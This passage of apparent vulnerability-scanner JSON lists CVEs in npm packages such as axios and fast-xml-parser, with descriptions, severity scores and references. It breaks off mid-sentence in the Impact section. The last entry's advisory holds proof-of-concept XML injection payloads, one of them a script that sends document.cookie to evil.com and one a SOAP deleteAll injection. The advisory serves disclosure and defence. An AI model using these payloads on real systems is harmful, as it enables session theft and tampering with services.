"https://www.cve.org/CVERecord?id=CVE-2026-25639" ], "PublishedDate": "2026-02-09T21:15:49.01Z", "LastModifiedDate": "2026-02-18T18:24:34.12Z" }, { "VulnerabilityID": "CVE-2025-62718", "VendorIDs": [ "GHSA-3p68-rc4w-qgx5" ], "PkgID": "axios@1.12.2", "PkgName": "axios", "PkgIdentifier": { "PURL": "pkg:npm/axios@1.12.2", "UID": "42b431016ae1856f" }, "InstalledVersion": "1.12.2", "FixedVersion": "1.15.0, 0.31.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-62718", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:49279be910a1264a8503df1e4001529f87c2262c2d30d14a9fec2b191e3e8f98", "Title": "axios: Axios: Server-Side Request Forgery and proxy bypass due to improper hostname normalization", "Description": "Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.31.0, Axios does not correctly handle hostname normalization when checking NO_PROXY rules. Requests to loopback addresses like localhost. (with a trailing dot) or [::1] (IPv6 literal) skip NO_PROXY matching and go through the configured proxy. This goes against what developers expect and lets attackers force requests through a proxy, even if NO_PROXY is set up to protect loopback or internal services. This issue leads to the possibility of proxy bypass and SSRF vulnerabilities allowing attackers to reach sensitive loopback or internal services despite the configured protections. This vulnerability is fixed in 1.15.0 and 0.31.0.", "Severity": "MEDIUM", "CweIDs": [ "CWE-441", "CWE-918" ], "VendorSeverity": { "ghsa": 2, "nvd": 4, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N", "V3Score": 4.8, "V40Score": 6.3 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L", "V3Score": 9.9 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L", "V3Score": 7 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2025-62718", "https://datatracker.ietf.org/doc/html/rfc1034#section-3.1", "https://datatracker.ietf.org/doc/html/rfc3986#section-3.2.2", "https://github.com/axios/axios", "https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c", "https://github.com/axios/axios/commit/fb3befb6daac6cad26b2e54094d0f2d9e47f24df", "https://github.com/axios/axios/pull/10661", "https://github.com/axios/axios/pull/10688", "https://github.com/axios/axios/releases/tag/v0.31.0", "https://github.com/axios/axios/releases/tag/v1.15.0", "https://github.com/axios/axios/security/advisories/GHSA-3p68-rc4w-qgx5", "https://nvd.nist.gov/vuln/detail/CVE-2025-62718", "https://www.cve.org/CVERecord?id=CVE-2025-62718" ], "PublishedDate": "2026-04-09T15:16:08.65Z", "LastModifiedDate": "2026-04-16T19:16:33.063Z" }, { "VulnerabilityID": "CVE-2026-40175", "VendorIDs": [ "GHSA-fvcv-3m26-pcqx" ], "PkgID": "axios@1.12.2", "PkgName": "axios", "PkgIdentifier": { "PURL": "pkg:npm/axios@1.12.2", "UID": "42b431016ae1856f" }, "InstalledVersion": "1.12.2", "FixedVersion": "1.15.0, 0.31.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-40175", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:b0bfd5805d9e52213affbe105be2c80a683640a31e880f8e68cbb9fbbef07a87", "Title": "axios: Axios: Remote Code Execution via Prototype Pollution escalation", "Description": "Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0 and 0.3.1, the Axios library is vulnerable to a specific \"Gadget\" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). This vulnerability is fixed in 1.15.0 and 0.3.1.", "Severity": "MEDIUM", "CweIDs": [ "CWE-113", "CWE-444", "CWE-918" ], "VendorSeverity": { "ghsa": 2, "nvd": 2, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "V3Score": 4.8 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "V3Score": 4.8 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "V3Score": 9 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-40175", "https://github.com/axios/axios", "https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c", "https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1", "https://github.com/axios/axios/pull/10660", "https://github.com/axios/axios/pull/10660#issuecomment-4224168081", "https://github.com/axios/axios/pull/10688", "https://github.com/axios/axios/releases/tag/v0.31.0", "https://github.com/axios/axios/releases/tag/v1.15.0", "https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx", "https://nvd.nist.gov/vuln/detail/CVE-2026-40175", "https://www.cve.org/CVERecord?id=CVE-2026-40175" ], "PublishedDate": "2026-04-10T20:16:22.8Z", "LastModifiedDate": "2026-04-21T19:44:44.4Z" }, { "VulnerabilityID": "CVE-2026-33750", "VendorIDs": [ "GHSA-f886-m6hf-6m8v" ], "PkgID": "brace-expansion@1.1.12", "PkgName": "brace-expansion", "PkgIdentifier": { "PURL": "pkg:npm/brace-expansion@1.1.12", "UID": "84bc3c1c5bf9dc3f" }, "InstalledVersion": "1.1.12", "FixedVersion": "5.0.5, 3.0.2, 2.0.3, 1.1.13", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33750", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:eda4b5bf3c46e5b4ee443a14af1ff5ecf8f7467d9a87ad1735377e27aa4dd063", "Title": "brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern", "Description": "The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and 1.1.13, a brace pattern with a zero step value (e.g., `{1..2..0}`) causes the sequence generation loop to run indefinitely, making the process hang for seconds and allocate heaps of memory. Versions 5.0.5, 3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize strings passed to `expand()` to ensure a step value of `0` is not used.", "Severity": "MEDIUM", "CweIDs": [ "CWE-400" ], "VendorSeverity": { "ghsa": 2, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-33750", "https://github.com/juliangruber/brace-expansion", "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113", "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184", "https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5", "https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2", "https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a", "https://github.com/juliangruber/brace-expansion/issues/98", "https://github.com/juliangruber/brace-expansion/pull/95", "https://github.com/juliangruber/brace-expansion/pull/96", "https://github.com/juliangruber/brace-expansion/pull/97", "https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v", "https://nvd.nist.gov/vuln/detail/CVE-2026-33750", "https://www.cve.org/CVERecord?id=CVE-2026-33750" ], "PublishedDate": "2026-03-27T15:16:57.297Z", "LastModifiedDate": "2026-04-22T14:23:19.11Z" }, { "VulnerabilityID": "CVE-2026-33750", "VendorIDs": [ "GHSA-f886-m6hf-6m8v" ], "PkgID": "brace-expansion@2.0.2", "PkgName": "brace-expansion", "PkgIdentifier": { "PURL": "pkg:npm/brace-expansion@2.0.2", "UID": "17232eb9182a44a1" }, "InstalledVersion": "2.0.2", "FixedVersion": "5.0.5, 3.0.2, 2.0.3, 1.1.13", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33750", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:4f40f60ea3f0cf4a04f39bdb10f5949a146ab526a5636952f92642cfea086fb8", "Title": "brace-expansion: brace-expansion: Denial of Service via zero step value in brace pattern", "Description": "The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to versions 5.0.5, 3.0.2, 2.0.3, and 1.1.13, a brace pattern with a zero step value (e.g., `{1..2..0}`) causes the sequence generation loop to run indefinitely, making the process hang for seconds and allocate heaps of memory. Versions 5.0.5, 3.0.2, 2.0.3, and 1.1.13 fix the issue. As a workaround, sanitize strings passed to `expand()` to ensure a step value of `0` is not used.", "Severity": "MEDIUM", "CweIDs": [ "CWE-400" ], "VendorSeverity": { "ghsa": 2, "nvd": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "V3Score": 6.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-33750", "https://github.com/juliangruber/brace-expansion", "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L107-L113", "https://github.com/juliangruber/brace-expansion/blob/daa71bcb4a30a2df9bcb7f7b8daaf2ab30e5794a/src/index.ts#L184", "https://github.com/juliangruber/brace-expansion/commit/311ac0d54994158c0a384e286a7d6cbb17ee8ed5", "https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2", "https://github.com/juliangruber/brace-expansion/commit/b9cacd9e55e7a1fa588fe4b7bb1159d52f1d902a", "https://github.com/juliangruber/brace-expansion/issues/98", "https://github.com/juliangruber/brace-expansion/pull/95", "https://github.com/juliangruber/brace-expansion/pull/96", "https://github.com/juliangruber/brace-expansion/pull/97", "https://github.com/juliangruber/brace-expansion/security/advisories/GHSA-f886-m6hf-6m8v", "https://nvd.nist.gov/vuln/detail/CVE-2026-33750", "https://www.cve.org/CVERecord?id=CVE-2026-33750" ], "PublishedDate": "2026-03-27T15:16:57.297Z", "LastModifiedDate": "2026-04-22T14:23:19.11Z" }, { "VulnerabilityID": "CVE-2026-24001", "VendorIDs": [ "GHSA-73rr-hh4g-fpgx" ], "PkgID": "diff@8.0.2", "PkgName": "diff", "PkgIdentifier": { "PURL": "pkg:npm/diff@8.0.2", "UID": "cb8731532713510" }, "InstalledVersion": "8.0.2", "FixedVersion": "8.0.3, 5.2.2, 4.0.4, 3.5.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-24001", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:1a2ef3a8105748e688b1b7728779c40234ca0ddc5f8ff725693446ca216c6d3a", "Title": "jsdiff: denial of service vulnerability in parsePatch and applyPatch", "Description": "jsdiff is a JavaScript text differencing implementation. Prior to versions 8.0.3, 5.2.2, 4.0.4, and 3.5.1, attempting to parse a patch whose filename headers contain the line break characters `\\r`, `\\u2028`, or `\\u2029` can cause the `parsePatch` method to enter an infinite loop. It then consumes memory without limit until the process crashes due to running out of memory. Applications are therefore likely to be vulnerable to a denial-of-service attack if they call `parsePatch` with a user-provided patch as input. A large payload is not needed to trigger the vulnerability, so size limits on user input do not provide any protection. Furthermore, some applications may be vulnerable even when calling `parsePatch` on a patch generated by the application itself if the user is nonetheless able to control the filename headers (e.g. by directly providing the filenames of the files to be diffed). The `applyPatch` method is similarly affected if (and only if) called with a string representation of a patch as an argument, since under the hood it parses that string using `parsePatch`. Other methods of the library are unaffected. Finally, a second and lesser interdependent bug - a ReDOS - also exhibits when those same line break characters are present in a patch's *patch* header (also known as its \"leading garbage\"). A maliciously-crafted patch header of length *n* can take `parsePatch` O(*n*³) time to parse. Versions 8.0.3, 5.2.2, 4.0.4, and 3.5.1 contain a fix. As a workaround, do not attempt to parse patches that contain any of these characters: `\\r`, `\\u2028`, or `\\u2029`.", "Severity": "LOW", "CweIDs": [ "CWE-400", "CWE-1333" ], "VendorSeverity": { "ghsa": 1, "nvd": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U", "V40Score": 2.7 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-24001", "https://github.com/kpdecker/jsdiff", "https://github.com/kpdecker/jsdiff/commit/15a1585230748c8ae6f8274c202e0c87309142f5", "https://github.com/kpdecker/jsdiff/issues/653", "https://github.com/kpdecker/jsdiff/pull/649", "https://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx", "https://nvd.nist.gov/vuln/detail/CVE-2026-24001", "https://www.cve.org/CVERecord?id=CVE-2026-24001" ], "PublishedDate": "2026-01-22T03:15:47.627Z", "LastModifiedDate": "2026-03-04T15:23:41.347Z" }, { "VulnerabilityID": "CVE-2026-25896", "VendorIDs": [ "GHSA-m7jm-9gc2-mpf2" ], "PkgID": "fast-xml-parser@4.5.3", "PkgName": "fast-xml-parser", "PkgIdentifier": { "PURL": "pkg:npm/fast-xml-parser@4.5.3", "UID": "457040697ff9b71f" }, "InstalledVersion": "4.5.3", "FixedVersion": "5.3.5, 4.5.4", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-25896", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:1f66714c4aba4c8a808f88b2d38bf16da0ed67a0b770ab61842c0fe16ccd64ba", "Title": "fast-xml-parser: fast-xml-parser: Cross-Site Scripting (XSS) due to improper DOCTYPE entity handling", "Description": "fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. From 4.1.3to before 5.3.5, a dot (.) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (\u0026lt;, \u0026gt;, \u0026amp;, \u0026quot;, \u0026apos;) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered. This vulnerability is fixed in 5.3.5.", "Severity": "CRITICAL", "CweIDs": [ "CWE-185" ], "VendorSeverity": { "ghsa": 4, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N", "V3Score": 9.3 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "V3Score": 7.1 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-25896", "https://github.com/NaturalIntelligence/fast-xml-parser", "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e", "https://github.com/NaturalIntelligence/fast-xml-parser/commit/ddcd0acf26ddd682cb0dc15a2bd6aa3b96bb1e69", "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.5", "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2", "https://nvd.nist.gov/vuln/detail/CVE-2026-25896", "https://www.cve.org/CVERecord?id=CVE-2026-25896" ], "PublishedDate": "2026-02-20T21:19:27.47Z", "LastModifiedDate": "2026-03-02T14:54:02.76Z" }, { "VulnerabilityID": "CVE-2026-26278", "VendorIDs": [ "GHSA-jmr7-xgp7-cmfj" ], "PkgID": "fast-xml-parser@4.5.3", "PkgName": "fast-xml-parser", "PkgIdentifier": { "PURL": "pkg:npm/fast-xml-parser@4.5.3", "UID": "457040697ff9b71f" }, "InstalledVersion": "4.5.3", "FixedVersion": "4.5.4, 5.3.6", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-26278", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:2b50a6e13429ef49bfc019908ac1dbaf1fbda4893c39d12fd88e719de8c06b54", "Title": "fast-xml-parser: fast-xml-parser: Denial of Service via unlimited XML entity expansion", "Description": "fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. In versions 4.1.3 through 5.3.5, the XML parser can be forced to do an unlimited amount of entity expansion. With a very small XML input, it’s possible to make the parser spend seconds or even minutes processing a single request, effectively freezing the application. Version 5.3.6 fixes the issue. As a workaround, avoid using DOCTYPE parsing by `processEntities: false` option.", "Severity": "HIGH", "CweIDs": [ "CWE-776" ], "VendorSeverity": { "ghsa": 3, "redhat": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-26278", "https://github.com/NaturalIntelligence/fast-xml-parser", "https://github.com/NaturalIntelligence/fast-xml-parser/commit/910dae5be2de2955e968558fadf6e8f74f117a77", "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.6", "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jmr7-xgp7-cmfj", "https://nvd.nist.gov/vuln/detail/CVE-2026-26278", "https://www.cve.org/CVERecord?id=CVE-2026-26278" ], "PublishedDate": "2026-02-19T20:25:43.717Z", "LastModifiedDate": "2026-02-23T19:30:26.017Z" }, { "VulnerabilityID": "CVE-2026-33036", "VendorIDs": [ "GHSA-8gc5-j5rx-235r" ], "PkgID": "fast-xml-parser@4.5.3", "PkgName": "fast-xml-parser", "PkgIdentifier": { "PURL": "pkg:npm/fast-xml-parser@4.5.3", "UID": "457040697ff9b71f" }, "InstalledVersion": "4.5.3", "FixedVersion": "5.5.6, 4.5.5", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33036", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:4b38304d06443d93ae4a4a205d6b78f4ca6e4d264fcd0aec2f2fae4aafbc14b8", "Title": "fast-xml-parser: fast-xml-parser: Denial of Service via XML entity expansion bypass", "Description": "fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. Versions 4.0.0-beta.3 through 5.5.5 contain a bypass vulnerability where numeric character references (\u0026#NNN;, \u0026#xHH;) and standard XML entities completely evade the entity expansion limits (e.g., maxTotalExpansions, maxExpandedLength) added to fix CVE-2026-26278, enabling XML entity expansion Denial of Service. The root cause is that replaceEntitiesValue() in OrderedObjParser.js only enforces expansion counting on DOCTYPE-defined entities while the lastEntities loop handling numeric/standard entities performs no counting at all. An attacker supplying 1M numeric entity references like \u0026#65; can force ~147MB of memory allocation and heavy CPU usage, potentially crashing the process—even when developers have configured strict limits. This issue has been fixed in version 5.5.6.", "Severity": "HIGH", "CweIDs": [ "CWE-776" ], "VendorSeverity": { "ghsa": 3, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-33036", "https://github.com/NaturalIntelligence/fast-xml-parser", "https://github.com/NaturalIntelligence/fast-xml-parser/commit/bd26122c838e6a55e7d7ac49b4ccc01a49999a01", "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v4.5.5", "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.5.6", "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-8gc5-j5rx-235r", "https://nvd.nist.gov/vuln/detail/CVE-2026-33036", "https://www.cve.org/CVERecord?id=CVE-2026-33036" ], "PublishedDate": "2026-03-20T06:16:11.63Z", "LastModifiedDate": "2026-03-23T16:28:10.93Z" }, { "VulnerabilityID": "CVE-2026-33349", "VendorIDs": [ "GHSA-jp2q-39xq-3w4g" ], "PkgID": "fast-xml-parser@4.5.3", "PkgName": "fast-xml-parser", "PkgIdentifier": { "PURL": "pkg:npm/fast-xml-parser@4.5.3", "UID": "457040697ff9b71f" }, "InstalledVersion": "4.5.3", "FixedVersion": "4.5.5, 5.5.7", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-33349", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:dcc4b62656f02e435a97091ee7c8a8d634164d29661b4d8430758273dacf882f", "Title": "fast-xml-parser: fast-xml-parser: Denial of Service via unbounded entity expansion due to incorrect configuration limit handling", "Description": "fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. From version 4.0.0-beta.3 to before version 5.5.7, the DocTypeReader in fast-xml-parser uses JavaScript truthy checks to evaluate maxEntityCount and maxEntitySize configuration limits. When a developer explicitly sets either limit to 0 — intending to disallow all entities or restrict entity size to zero bytes — the falsy nature of 0 in JavaScript causes the guard conditions to short-circuit, completely bypassing the limits. An attacker who can supply XML input to such an application can trigger unbounded entity expansion, leading to memory exhaustion and denial of service. This issue has been patched in version 5.5.7.", "Severity": "MEDIUM", "CweIDs": [ "CWE-1284" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 5.9 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-33349", "https://github.com/NaturalIntelligence/fast-xml-parser", "https://github.com/NaturalIntelligence/fast-xml-parser/commit/239b64aa1fc5c5455ddebbbb54a187eb68c9fdb7", "https://github.com/NaturalIntelligence/fast-xml-parser/commit/88d0936a23dabe51bfbf42255e2ce912dfee2221", "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jp2q-39xq-3w4g", "https://nvd.nist.gov/vuln/detail/CVE-2026-33349", "https://www.cve.org/CVERecord?id=CVE-2026-33349" ], "PublishedDate": "2026-03-24T20:16:29.407Z", "LastModifiedDate": "2026-03-26T13:01:52.857Z" }, { "VulnerabilityID": "CVE-2026-41650", "VendorIDs": [ "GHSA-gh4j-gqv2-49f6" ], "PkgID": "fast-xml-parser@4.5.3", "PkgName": "fast-xml-parser", "PkgIdentifier": { "PURL": "pkg:npm/fast-xml-parser@4.5.3", "UID": "457040697ff9b71f" }, "InstalledVersion": "4.5.3", "FixedVersion": "5.7.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41650", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:311efcd5e8a0e072ca02fcad55dc70800cf59415ae40191567ef14181417da08", "Title": "fast-xml-parser XMLBuilder: XML Comment and CDATA Injection via Unescaped Delimiters", "Description": "# fast-xml-parser XMLBuilder: Comment and CDATA Injection via Unescaped Delimiters\n\n## Summary\n\nfast-xml-parser XMLBuilder does not escape the `--\u003e` sequence in comment content or the `]]\u003e` sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation.\n\nExisting CVEs for fast-xml-parser cover different issues:\n- CVE-2023-26920: Prototype pollution (parser)\n- CVE-2023-34104: ReDoS (parser)\n- CVE-2026-27942: Stack overflow in XMLBuilder with preserveOrder\n- CVE-2026-25896: Entity encoding bypass via regex in DOCTYPE entities\n\nThis finding covers **unescaped comment/CDATA delimiters in XMLBuilder** - a distinct vulnerability.\n\n## Vulnerable Code\n\n**File**: `src/fxb.js`\n\n```javascript\n// Line 442 - Comment building with NO escaping of --\u003e\nbuildTextValNode(val, key, attrStr, level) {\n // ...\n if (key === this.options.commentPropName) {\n return this.indentate(level) + `\u003c!--${val}--\u003e` + this.newLine; // VULNERABLE\n }\n // ...\n if (key === this.options.cdataPropName) {\n return this.indentate(level) + `\u003c![CDATA[${val}]]\u003e` + this.newLine; // VULNERABLE\n }\n}\n```\n\nCompare with attribute/text escaping which IS properly handled via `replaceEntitiesValue()`.\n\n## Proof of Concept\n\n### Test 1: Comment Injection (XSS in SVG/HTML context)\n\n```javascript\nimport { XMLBuilder } from 'fast-xml-parser';\n\nconst builder = new XMLBuilder({\n commentPropName: \"#comment\",\n format: true,\n suppressEmptyNode: true\n});\n\nconst xml = {\n root: {\n \"#comment\": \"--\u003e\u003cscript\u003ealert('XSS')\u003c/script\u003e\u003c!--\",\n data: \"legitimate content\"\n }\n};\n\nconsole.log(builder.build(xml));\n```\n\n**Output**:\n```xml\n\u003croot\u003e\n \u003c!----\u003e\u003cscript\u003ealert('XSS')\u003c/script\u003e\u003c!----\u003e\n \u003cdata\u003elegitimate content\u003c/data\u003e\n\u003c/root\u003e\n```\n\n### Test 2: CDATA Injection (RSS feed)\n\n```javascript\nconst builder = new XMLBuilder({\n cdataPropName: \"#cdata\",\n format: true,\n suppressEmptyNode: true\n});\n\nconst rss = {\n rss: { channel: { item: {\n title: \"Article\",\n description: {\n \"#cdata\": \"Content]]\u003e\u003cscript\u003efetch('https://evil.com/'+document.cookie)\u003c/script\u003e\u003c![CDATA[more\"\n }\n }}}\n};\n\nconsole.log(builder.build(rss));\n```\n\n**Output**:\n```xml\n\u003crss\u003e\n \u003cchannel\u003e\n \u003citem\u003e\n \u003ctitle\u003eArticle\u003c/title\u003e\n \u003cdescription\u003e\n \u003c![CDATA[Content]]\u003e\u003cscript\u003efetch('https://evil.com/'+document.cookie)\u003c/script\u003e\u003c![CDATA[more]]\u003e\n \u003c/description\u003e\n \u003c/item\u003e\n \u003c/channel\u003e\n\u003c/rss\u003e\n```\n\n### Test 3: SOAP Message Injection\n\n```javascript\nconst builder = new XMLBuilder({\n commentPropName: \"#comment\",\n format: true\n});\n\nconst soap = {\n \"soap:Envelope\": {\n \"soap:Body\": {\n \"#comment\": \"Request from user: --\u003e\u003csoap:Body\u003e\u003cAction\u003edeleteAll\u003c/Action\u003e\u003c/soap:Body\u003e\u003c!--\",\n Action: \"getBalance\",\n UserId: \"12345\"\n }\n }\n};\n\nconsole.log(builder.build(soap));\n```\n\n**Output**:\n```xml\n\u003csoap:Envelope\u003e\n \u003csoap:Body\u003e\n \u003c!--Request from user: --\u003e\u003csoap:Body\u003e\u003cAction\u003edeleteAll\u003c/Action\u003e\u003c/soap:Body\u003e\u003c!----\u003e\n \u003cAction\u003egetBalance\u003c/Action\u003e\n \u003cUserId\u003e12345\u003c/UserId\u003e\n \u003c/soap:Body\u003e\n\u003c/soap:Envelope\u003e\n```\n\nThe injected `\u003cAction\u003edeleteAll\u003c/Action\u003e` appears as a real SOAP action element.\n\n## Tested Output\n\nAll tests run on Node.js v22, fast-xml-parser v5.5.12:\n\n```\n1. COMMENT INJECTION:\n Injection successful: true\n\n2. CDATA INJECTION (RSS feed scenario):\n Injection successful: true\n\n4. Round-trip test:\n Injection present: true\n\n5. SOAP MESSAGE INJECTION:\n Contains injected Action: true\n```\n\n## Impact\n\nAn attacker who controls data that flows into XML comments or CDATA sections via XMLBuilder can:\n\n1. **XSS**: 